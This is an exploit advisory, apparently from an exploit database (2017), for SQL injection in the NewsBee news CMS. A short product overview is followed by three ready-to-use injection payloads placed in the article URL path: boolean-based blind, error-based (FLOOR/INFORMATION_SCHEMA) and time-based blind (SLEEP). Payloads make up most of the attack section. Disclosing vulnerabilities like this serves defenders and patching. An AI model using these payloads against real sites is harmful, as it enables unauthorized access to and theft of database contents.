NewsBee CMS - SQL Injection

Exploit Title: NewsBee CMS – SQL Injection
Date: 06.02.2017
Software Link: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937?s_rank=2
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

NewsBee is a Fully Featured News Site CMS (Content Management System). This CMS Includes almost everything you need to make a News Site easily and Creatively. The In build Features will help you to easily manage the site contents not only news articles, but also many other related contents which are commonly used in news sites.
Vulnerabilities:

SQL Injection

URL : http://localhost/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goals.html

Payload:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/newsbee/30' AND 5694=5694 AND 'fpmw'='fpmw_news_thai_soccer_targets_asia_wide_goals.html

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://localhost/newsbee/30' AND (SELECT 4020 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: http://localhost/newsbee/30' OR SLEEP(5) AND 'VLvJ'='VLvJ_news_thai_soccer_targets_asia_wide_goals.html
---